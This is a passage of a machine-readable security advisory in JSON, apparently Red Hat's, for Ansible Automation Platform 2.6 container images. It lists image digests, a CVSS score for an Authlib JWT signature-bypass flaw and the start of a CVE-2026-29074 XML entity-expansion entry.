"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access"
},
{
"cve": "CVE-2026-29074",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-03-06T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
